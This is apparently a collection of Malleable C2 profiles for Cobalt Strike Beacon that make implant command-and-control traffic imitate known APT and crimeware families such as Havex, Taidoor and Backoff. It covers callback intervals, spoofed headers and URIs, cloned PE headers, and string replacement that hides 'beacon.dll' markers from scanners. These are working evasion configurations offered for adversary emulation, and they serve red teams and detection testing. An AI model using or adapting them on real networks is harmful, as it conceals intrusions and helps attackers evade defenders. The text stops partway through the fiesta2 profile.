├── APT ├── apt1_virtuallythere.profile ├── comfoo.profile ├── etumbot.profile ├── havex.profile ├── meterpreter.profile ├── pitty_tiger.profile ├── putter.profile ├── string_of_paerls.profile └── taidoor.profile ├── crimeware ├── asprox.profile ├── backoff.profile ├── fiesta.profile ├── fiesta2.profile ├── magnitude.profile └── zeus.profile └── normal ├── amazon.profile ├── bingsearch_getonly.profile ├── cnnvideo_getonly.profile ├── gmail.profile ├── googledrive_getonly.profile ├── microsoftteams_getonly.profile ├── microsoftupdate_getonly.profile ├── msnbcvideo_getonly.profile ├── ocsp.profile ├── onedrive_getonly.profile ├── pandora.profile ├── randomized.profile ├── reference.profile ├── rtmp.profile ├── safebrowsing.profile ├── webbug.profile ├── webbug_getonly.profile └── wikipedia_getonly.profile /APT/apt1_virtuallythere.profile: -------------------------------------------------------------------------------- 1 | # APT1 VIRTUALLYTHERE SSL 2 | # 3 | # Reference: Mandiant's APT1 Report 4 | # Digital Appendx F - SSL Certificates 5 | # http://intelreport.mandiant.com/ 6 | # 7 | # Author: @armitagehacker 8 | set sample_name "APT1 Virtually There Malware"; 9 | 10 | # this is the certificate 11 | https-certificate { 12 | set C "US"; 13 | set ST "Some-State"; 14 | set O "www.virtuallythere.com"; 15 | set OU "new"; 16 | set CN "new"; 17 | } 18 | 19 | # since *cough* presumably you're using an HTTPS Beacon... 20 | http-get { 21 | set uri "/zOMGAPT"; 22 | 23 | client { 24 | metadata { 25 | netbiosu; 26 | parameter "tmp"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/BUYTHEAPTDETECTORNOW"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | 45 | id { 46 | uri-append; 47 | } 48 | 49 | output { 50 | print; 51 | } 52 | } 53 | 54 | server { 55 | header "Content-Type" "text/html"; 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /APT/comfoo.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Comfoo profile 3 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "20"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"; 12 | 13 | http-get { 14 | 15 | set uri "/CWoNaJLBo/VTNeWw11212/"; 16 | 17 | client { 18 | 19 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 20 | header "Accept-Language" "en-en"; 21 | header "Connection" "Keel-Alive"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbiosu; 26 | append "/UTWOqVQ132/"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "Apache/2.0.50 (Unix)"; 34 | header "Keep-Alive" "timeout=15, max=90"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/CWoNaJLBo/VTNeWw11213/"; 45 | 46 | client { 47 | 48 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 49 | header "Accept-Language" "en-en"; 50 | header "Connection" "Keel-Alive"; 51 | header "Cache-Control" "no-cache"; 52 | 53 | id { 54 | netbiosu; 55 | append "/UTWOqVQ132/"; 56 | uri-append; 57 | } 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | 64 | server { 65 | 66 | header "Server" "Apache/2.0.50 (Unix)"; 67 | header "Keep-Alive" "timeout=15, max=90"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/etumbot.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Etumbot Profile 3 | # http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Etumbot"; 8 | 9 | set sleeptime "5000"; 10 | set jitter "0"; 11 | set maxdns "255"; 12 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; 13 | 14 | http-get { 15 | 16 | set uri "/image/"; 17 | 18 | client { 19 | 20 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; 21 | header "Referer" "http://www.google.com"; 22 | header "Pragma" "no-cache"; 23 | header "Cache-Control" "no-cache"; 24 | 25 | metadata { 26 | netbios; 27 | append "-.jpg"; 28 | uri-append; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Content-Type" "img/jpg"; 35 | header "Server" "Microsoft-IIS/6.0"; 36 | header "X-Powered-By" "ASP.NET"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | set uri "/history/"; 47 | 48 | client { 49 | 50 | header "Content-Type" "application/octet-stream"; 51 | header "Referer" "http://www.google.com"; 52 | header "Pragma" "no-cache"; 53 | header "Cache-Control" "no-cache"; 54 | 55 | id { 56 | netbiosu; 57 | append ".asp"; 58 | uri-append; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Content-Type" "img/jpg"; 70 | header "Server" "Microsoft-IIS/6.0"; 71 | header "X-Powered-By" "ASP.NET"; 72 | 73 | output { 74 | base64; 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /APT/havex.profile: -------------------------------------------------------------------------------- 1 | # havex trojan C&C profile 2 | # Actor: Energetic Bear / Crouching Yeti / Dragonfly 3 | # 4 | # See: 5 | # . http://www.symantec.com/connect/blogs/emerging-threat-dragonfly-energetic-bear-apt-group 6 | # . https://securelist.com/files/2014/07/EB-YetiJuly2014-Public.pdf 7 | # . http://pastebin.com/qCdMwtZ6 8 | # . http://www.crowdstrike.com/sites/all/themes/crowdstrike2/css/imgs/platform/CrowdStrike_Global_Threat_Report_2013.pdf 9 | # . https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Havex.yar 10 | # . http://web.archive.org/web/20170808180137/www.f-secure.com/weblog/archives/00002718.html 11 | # . https://www.virustotal.com/#/file/3d3daee1a38e67707921b222f1685d5bd6328af2fc80d4c11d92dc6a6c289261/details 12 | # 13 | # Author: @armitagehacker 14 | 15 | set sample_name "HaveX Trojan"; 16 | 17 | set sleeptime "30000"; 18 | 19 | set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08"; 20 | 21 | set pipename "mypipe-f##"; 22 | set pipename_stager "mypipe-h##"; 23 | 24 | # Clone some header values (Sample from: https://malshare.com/sample.php?action=detail&hash=c6e161a948f4474849d5740b2f27964a) 25 | # ./peclone c6e161a948f4474849d5740b2f27964a 26 | stage { 27 | set checksum "0"; 28 | set compile_time "30 Dec 2013 07:53:48"; 29 | set entry_point "134733"; 30 | set image_size_x86 "348160"; 31 | set image_size_x64 "348160"; 32 | set name "Tmprovider.dll"; 33 | set rich_header "\x63\x02\x25\x0f\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x9a\x2c\xdd\x5c\x24\x63\x4b\x5c\x2e\x1b\xde\x5c\x3b\x63\x4b\x5c\x2e\x1b\xcf\x5c\x1b\x63\x4b\x5c\x2e\x1b\xc8\x5c\x8f\x63\x4b\x5c\x00\xa5\x30\x5c\x28\x63\x4b\x5c\x27\x63\x4a\x5c\x97\x63\x4b\x5c\x2e\x1b\xc1\x5c\x60\x63\x4b\x5c\x2e\x1b\xd9\x5c\x26\x63\x4b\x5c\x39\x31\xdf\x5c\x26\x63\x4b\x5c\x2e\x1b\xda\x5c\x26\x63\x4b\x5c\x52\x69\x63\x68\x27\x63\x4b\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 34 | 35 | # disable this little obfuscation 36 | set stomppe "false"; 37 | 38 | # make these things havex-ish 39 | transform-x86 { 40 | strrep "ReflectiveLoader" "RunDllEntry"; 41 | strrep "beacon.dll" ""; 42 | } 43 | 44 | transform-x64 { 45 | strrep "ReflectiveLoader" "RunDllEntry"; 46 | strrep "beacon.x64.dll" ""; 47 | } 48 | 49 | # strings gathered from Yara rules and sandbox string dumps 50 | stringw "%s <%s> (Type=%i, Access=%i, ID='%s')"; 51 | stringw "%02i was terminated by ThreadManager(2)\n"; 52 | stringw "main sort initialise ...\n"; 53 | stringw "qsort [0x%x, 0x%x] done %d this %d\n"; 54 | stringw "{0x%08x, 0x%08x}"; 55 | stringw "Programm was started at %02i:%02i:%02i\n"; 56 | stringw "a+"; 57 | stringw "%02i:%02i:%02i.%04i:"; 58 | stringw "**************************************************************************\n"; 59 | stringw "Start finging of LAN hosts...\n"; 60 | stringw "Finding was fault. Unexpective error\n"; 61 | stringw "Hosts was't found.\n"; 62 | stringw "\t\t\t\t\t%O2i) [%s]\n"; 63 | stringw "Start finging of OPC Servers..."; 64 | stringw "Was found %i OPC Servers."; 65 | stringw "\t\t%i) [%s\\%s]\n\t\t\tCLSID: %s\n"; 66 | stringw "\t\t\tUserType: %s\n\t\t\tVerIndProgID: %s\n"; 67 | stringw "OPC Servers not found. Programm finished"; 68 | stringw "Start finging of OPC Tags..."; 69 | stringw "[-]Threads number > Hosts number"; 70 | stringw "[-]Can not get local ip"; 71 | stringw "[!]Start"; 72 | stringw "[+]Get WSADATA"; 73 | stringw "[+]Local:"; 74 | stringw "[-]Connection error"; 75 | stringw "Was found %i hosts in LAN:"; 76 | stringw "%s[%s]!!!EXEPTION %i!!!"; 77 | stringw "final combined CRC = 0x%08x"; 78 | } 79 | 80 | http-get { 81 | set uri "/include/template/isx.php /wp06/wp-includes/po.php /wp08/wp-includes/dtcla.php"; 82 | 83 | client { 84 | header "Referer" "http://www.google.com"; 85 | header "Accept" "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"; 86 | header "Accept-Language" "en-us,en;q=0.5"; 87 | 88 | # base64 encoded Cookie is not a havex indicator, but a place to stuff our data 89 | metadata { 90 | base64; 91 | header "Cookie"; 92 | } 93 | } 94 | 95 | server { 96 | header "Server" "Apache/2.2.26 (Unix)"; 97 | header "X-Powered-By" "PHP/5.3.28"; 98 | header "Cache-Control" "no-cache"; 99 | header "Content-Type" "text/html"; 100 | header "Keep-Alive" "timeout=3, max=100"; 101 | 102 | output { 103 | base64; 104 | prepend "Sorry, no data corresponding your request."; 106 | print; 107 | } 108 | } 109 | } 110 | 111 | # define indicators for an HTTP POST 112 | http-post { 113 | set uri "/modules/mod_search.php /blog/wp-includes/pomo/src.php /includes/phpmailer/class.pop3.php"; 114 | 115 | client { 116 | header "Content-Type" "application/octet-stream"; 117 | 118 | # transmit our sess id as /whatever.php?id=[identifier] 119 | id { 120 | parameter "id"; 121 | } 122 | 123 | # post our output with no real changes 124 | output { 125 | print; 126 | } 127 | } 128 | 129 | # The server's response to our HTTP POST 130 | server { 131 | header "Server" "Apache/2.2.26 (Unix)"; 132 | header "X-Powered-By" "PHP/5.3.28"; 133 | header "Cache-Control" "no-cache"; 134 | header "Content-Type" "text/html"; 135 | header "Keep-Alive" "timeout=3, max=100"; 136 | 137 | # this will just print an empty string, meh... 138 | output { 139 | prepend "blah blah blah"; 140 | mask; 141 | base64; 142 | prepend "Sorry, no data corresponding your request."; 144 | print; 145 | } 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /APT/meterpreter.profile: -------------------------------------------------------------------------------- 1 | # Meterpreter profile 2 | # 3 | # This was a fun exercise, make Beacon Meterpreter-like. :) 4 | # 5 | # https://www.metasploit.com/ 6 | # 7 | set sample_name "Meterpreter"; 8 | 9 | # 100ms sleep time. 10 | set sleeptime "100"; 11 | 12 | # what else would we spawn to? 13 | set spawnto_x86 "%windir%\\syswow64\\notepad.exe"; 14 | set spawnto_x64 "%windir%\\sysnative\\notepad.exe"; 15 | 16 | # process injection tweak 17 | set hijack_remote_thread "false"; 18 | 19 | # propagate user-agent to all transactions 20 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"; 21 | 22 | # set some PE and memory indicators to resemble the metasploit rDLL 23 | stage { 24 | # PE header fields 25 | set checksum "0"; 26 | set compile_time "08 May 2017 23:13:38"; 27 | set entry_point "558586"; 28 | set image_size_x86 "987136"; 29 | set image_size_x64 "1232896"; 30 | set name "metsrv.dll"; 31 | set rich_header "\xf4\x1f\x93\x1a\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xf6\x2f\x1c\x49\x9d\x7e\xfd\x49\xf6\x2f\x22\x49\xaf\x7e\xfd\x49\xf6\x2f\x1d\x49\x0b\x7e\xfd\x49\xcd\x07\x1d\x49\x3f\x7f\xfd\x49\xb0\x7e\xfc\x49\x63\x7e\xfd\x49\xb9\x06\x6e\x49\xa1\x7e\xfd\x49\xb9\x06\x7e\x49\xb1\x7e\xfd\x49\xbd\x2c\x22\x49\xb1\x7e\xfd\x49\xbd\x2c\x1d\x49\xaa\x7e\xfd\x49\xbd\x2c\x21\x49\xb1\x7e\xfd\x49\xbd\x2c\x23\x49\xb1\x7e\xfd\x49\x52\x69\x63\x68\xb0\x7e\xfd\x49\x00\x00\x00\x00\x00\x00\x00\x00"; 32 | 33 | # obfuscations 34 | set userwx "true"; 35 | set stomppe "false"; 36 | 37 | # strings 38 | stringw "%04x-%04x:%s"; 39 | stringw "pipe"; 40 | stringw "SeSecurityPrivilege"; 41 | stringw "pipe"; 42 | stringw "\\\\%s\\pipe\\%s"; 43 | stringw "https"; 44 | stringw "POST"; 45 | stringw "POST"; 46 | string "stdapi_sys_process_getpid"; 47 | string "[%x]"; 48 | string "buffer_from_file"; 49 | string "buffer_to_file"; 50 | string "channel_close"; 51 | string "channel_create"; 52 | 53 | # get rid of some stuff 54 | transform-x86 { 55 | strrep "beacon.dll" ""; 56 | } 57 | 58 | transform-x64 { 59 | strrep "beacon.x64.dll" ""; 60 | } 61 | } 62 | 63 | # SSL cert 64 | https-certificate { 65 | set O "dmcjna"; 66 | set CN "dmcjna"; 67 | set validity "3285"; 68 | } 69 | 70 | # staging process 71 | http-stager { 72 | server { 73 | header "Content-Type" "application/octet-stream"; 74 | header "Connection" "Keep-Alive"; 75 | header "Server" "Apache"; 76 | } 77 | } 78 | 79 | # HTTP GET 80 | http-get { 81 | set uri "/ucD"; 82 | 83 | client { 84 | header "Cache-Control" "no-cache"; 85 | header "Connection" "Keep-Alive"; 86 | header "Pragma" "no-cache"; 87 | 88 | metadata { 89 | base64url; 90 | uri-append; 91 | } 92 | } 93 | 94 | server { 95 | header "Content-Type" "application/octet-stream"; 96 | header "Connection" "Keep-Alive"; 97 | header "Server" "Apache"; 98 | 99 | output { 100 | print; 101 | } 102 | } 103 | } 104 | 105 | # HTTP POST 106 | http-post { 107 | set uri "/ucW"; 108 | 109 | client { 110 | header "Cache-Control" "no-cache"; 111 | header "Connection" "Keep-Alive"; 112 | header "Pragma" "no-cache"; 113 | 114 | id { 115 | base64url; 116 | append "UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ"; 117 | uri-append; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | # The server's response to our HTTP POST 126 | server { 127 | header "Content-Type" "application/octet-stream"; 128 | header "Connection" "Keep-Alive"; 129 | header "Server" "Apache"; 130 | 131 | # this will just print an empty string, meh... 132 | output { 133 | print; 134 | } 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /APT/pitty_tiger.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Pitty Tiger RAT profile 3 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 4 | # 5 | # One of several RATs used by the Pitty Tiger campaign 6 | # 7 | # Author: @harmj0y 8 | # 9 | set sample_name "Pitty Tiger RAT"; 10 | 11 | set sleeptime "30000"; # use a ~30s delay between callbacks 12 | set jitter "20"; 13 | set maxdns "255"; 14 | set useragent "Microsoft Internet Explorer"; 15 | 16 | http-get { 17 | 18 | set uri "/FC001/JOHN"; 19 | 20 | client { 21 | 22 | header "Host" "newb02.skypetm.com.tw"; 23 | header "Connection" "Keel-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Connection" "Keel-Alive"; 34 | header "Content-Type" "text/html"; 35 | header "Server" "IIS5.0"; 36 | 37 | output { 38 | base64; 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | set uri "/FC002/JOHN-"; 46 | 47 | client { 48 | 49 | header "Host" "newb02.skypetm.com.tw"; 50 | header "Connection" "Keel-Alive"; 51 | 52 | id { 53 | netbiosu; 54 | uri-append; 55 | } 56 | 57 | output { 58 | base64; 59 | print; 60 | } 61 | } 62 | 63 | server { 64 | 65 | header "Connection" "Keel-Alive"; 66 | header "Content-Type" "text/html"; 67 | header "Server" "IIS5.0"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/putter.profile: -------------------------------------------------------------------------------- 1 | # Putter Panda HTTPCLIENT Profile 2 | # http://resources.crowdstrike.com/putterpanda/ 3 | # 4 | # Author: @armitagehacker 5 | 6 | # 500ms is default callback for this Web C2 shell 7 | set sample_name "Putter Panda"; 8 | 9 | set sleeptime "500"; 10 | 11 | http-get { 12 | # Beacon will randomly choose from this pool of URIs 13 | set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx"; 14 | 15 | client { 16 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 17 | 18 | # deliberate attempt to reproduce bug in HTTPCLIENT 19 | header "Accept" "*/*, ..., ......, ."; 20 | 21 | # encode session metadata into tmp var 22 | metadata { 23 | netbiosu; 24 | parameter "tmp"; 25 | } 26 | } 27 | 28 | # no special server side indicators as the report didn't say anything one way 29 | # or the other about these. 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/MicrosoftUpdate/GetUpdate/KB"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 45 | 46 | id { 47 | append "/default.asp"; 48 | uri-append; 49 | } 50 | 51 | output { 52 | print; 53 | } 54 | } 55 | 56 | server { 57 | header "Content-Type" "text/html"; 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /APT/string_of_paerls.profile: -------------------------------------------------------------------------------- 1 | # 2 | # String of Paerls profile 3 | # http://blogs.cisco.com/security/a-string-of-paerls/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "String of Paerls"; 8 | 9 | set sleeptime "30000"; # use a ~30 second main interval 10 | set jitter "30"; # 35% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0"; 13 | 14 | http-get { 15 | 16 | # GET request modeled as well as possible based on incomplete information 17 | set uri "/2/R.exe"; 18 | 19 | client { 20 | 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | 23 | # encode session metadata 24 | metadata { 25 | base64; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2"; 32 | header "X-Powered-By" "PHP/5.3.28"; 33 | header "Vary" "User-Agent"; 34 | header "Content-Type" "application/octet-stream"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/boss/image.php"; 45 | 46 | client { 47 | 48 | header "Content-Type" "application/x-www-form-urlencoded"; 49 | 50 | id { 51 | netbios; 52 | parameter "id"; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "Apache/2"; 63 | header "X-Powered-By" "PHP/5.3.28"; 64 | header "Vary" "User-Agent"; 65 | header "Content-Type" "application/octet-stream"; 66 | 67 | output { 68 | print; 69 | } 70 | } 71 | } 72 | 73 | -------------------------------------------------------------------------------- /APT/taidoor.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Taidoor Profile 3 | # http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Taidoor"; 8 | 9 | set sleeptime "40000"; # use a ~40 second main interval 10 | set jitter "35"; # 35% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp"; 17 | 18 | client { 19 | 20 | header "Connection" "Keep-Alive"; 21 | header "Cache-Control" "no-cache"; 22 | 23 | # encode session metadata 24 | metadata { 25 | netbiosu; 26 | parameter "mn"; 27 | } 28 | } 29 | 30 | # no special server side indicators as the report didn't say anything one way 31 | # or the other about these. 32 | server { 33 | header "Server" "Microsoft-IIS/5.0"; 34 | header "Content-Type" "text/html"; 35 | header "Connection" "close"; 36 | 37 | output { 38 | base64; 39 | prepend "\n"; 44 | append "\n"; 45 | append "\n"; 46 | print; 47 | } 48 | } 49 | } 50 | 51 | http-post { 52 | set uri "/submit.jsp"; 53 | 54 | client { 55 | 56 | header "Connection" "Keep-Alive"; 57 | header "Cache-Control" "no-cache"; 58 | 59 | id { 60 | netbios; 61 | parameter "du"; 62 | } 63 | 64 | output { 65 | print; 66 | } 67 | } 68 | 69 | server { 70 | header "Server" "Microsoft-IIS/5.0"; 71 | header "Content-Type" "text/html"; 72 | header "Connection" "close"; 73 | 74 | output { 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /crimeware/asprox.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Asprox botnet traffic profile 3 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Asprox Botnet"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "20"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; 13 | 14 | http-get { 15 | 16 | set uri "/"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | header "Content-Transfer-Encoding" "base64"; 23 | header "Connection" "Keep-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "nginx/1.2.5"; 34 | header "Content-Type" "text/html"; 35 | header "X-Powered-By" "PHP/5.4.4-7"; 36 | header "Vary" "Accept-Encoding"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | # random hash to try to simulate the post uri in the report 48 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; 49 | 50 | client { 51 | 52 | header "Accept" "*/*"; 53 | header "Content-Type" "application/x-www-form-urlencoded"; 54 | header "Content-Transfer-Encoding" "base64"; 55 | header "Connection" "Keep-Alive"; 56 | 57 | id { 58 | parameter "id"; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Server" "nginx/1.2.5"; 70 | header "Content-Type" "text/html"; 71 | header "X-Powered-By" "PHP/5.4.4-7"; 72 | header "Vary" "Accept-Encoding"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /crimeware/backoff.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Backoff POS Malware 3 | # 4 | # This profile takes steps to dress up the POST side of Beacon's C2 to 5 | # look like Backoff. The GET side is left generic. 6 | # 7 | # Indicators from: 8 | # http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html 9 | # https://gsr.trustwave.com/topics/backoff-pos-malware/backoff-malware-overview/ 10 | # 11 | # Author: @armitagehacker 12 | # 13 | # 14 | set sample_name "Backoff POS Malware"; 15 | 16 | set sleeptime "30000"; # use a ~30s delay between callbacks 17 | set jitter "10"; # throw in a 10% jitter 18 | 19 | set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"; 20 | 21 | # the relevant indicators 22 | http-post { 23 | set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php"; 24 | 25 | client { 26 | header "Accept" "text/plain"; 27 | header "Accept-Language" "en-us"; 28 | header "Accept-Encoding" "text/plain"; 29 | header "Content-Type" "application/x-www-form-urlencoded"; 30 | 31 | id { 32 | netbios; 33 | parameter "id"; 34 | } 35 | 36 | output { 37 | base64; 38 | prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="; 39 | print; 40 | } 41 | } 42 | 43 | server { 44 | output { 45 | print; 46 | } 47 | } 48 | } 49 | 50 | # No information on backoff use of GET, so generic GET request. 51 | http-get { 52 | set uri "/updates"; 53 | 54 | client { 55 | metadata { 56 | netbiosu; 57 | prepend "user="; 58 | header "Cookie"; 59 | } 60 | } 61 | 62 | server { 63 | header "Content-Type" "text/plain"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /crimeware/fiesta.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; 12 | 13 | http-get { 14 | 15 | set uri "/rmvk30g/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; 20 | header "Connection" "keep-alive"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";1;4;1"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2.2.15 (CentOS)"; 32 | header "X-Powered-By" "PHP/5.3.27"; 33 | header "Content-Type" "application/octet-stream"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/"; 45 | 46 | client { 47 | 48 | # fake out a different user agent for the post back 49 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; 50 | 51 | id { 52 | netbios; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | header "Server" "nginx/1.4.2"; 64 | header "Content-Type" "text/html"; 65 | header "Connection" "close"; 66 | 67 | output { 68 | base64; 69 | print; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /crimeware/fiesta2.profile: -------------------------------------------------------------------------------- 1 | # 2 | # A second Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Fiesta Exploit Kit"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "10"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | 13 | http-get { 14 | 15 | set uri "/v20idaf/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "*/*"; 20 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";112202;228"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "nginx/1.4.4"; 32 | header "Content-Type" "application/octet-stream"; 33 | header "Connection" "close"; 34 | 35 | output { 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | 43 | set uri "/"; 44 | 45 | client { 46 | 47 | header "Accept" "*/*"; 48 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 49 | 50 | id { 51 | netbios; 52 | uri-append; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "nginx/1.4.4"; 63 | header "Content-Type" "application/octet-stream"; 64 | header "Connection" "close"; 65 | 66 